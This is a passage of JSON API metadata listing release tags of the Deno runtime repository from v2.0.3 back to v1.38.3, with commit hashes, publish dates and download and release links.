pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts